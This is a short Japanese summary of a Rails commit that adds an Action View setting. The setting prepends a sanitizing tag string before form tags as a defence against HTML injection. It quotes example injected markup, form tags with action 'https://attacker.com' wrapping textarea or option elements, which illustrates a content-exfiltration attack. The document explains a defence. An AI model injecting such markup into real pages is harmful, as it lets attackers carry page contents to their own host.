2022/08/15分のコミットです。
CHANGELOGへの追加はありませんでした。
Merge pull request #44472 from camertron/content_injection_prevention
Action Viewの修正です。
formタグに対して、XSS対策用の特殊なコンテントの追加が出来るよう修正しています。この機能はconfig.action_view.prepend_content_exfiltration_prevention
にtrueを指定した場合に実行されるようになっています。この機能を有効化すると、form
タグの前に下記のようなタグが追加されます。
<!-- '"` --><!-- </textarea></xmp> --></option></form>
これは、<form action="https://attacker.com"><textarea>
、や<form action="https://attacker.com"><option>
などのHTMLがなんらかの理由でinjectされてしまった場合に、それらの攻撃を防げるようにする為に追加しているとのことです。
なお、このコンテントを追加した事で、HTMLの構成としては不正な構成になりますが、これはGitHubですでにやっている対策で、GitHubではこれによりブラウザに不正なHTMLとみなされ問題になった事はない、との事です。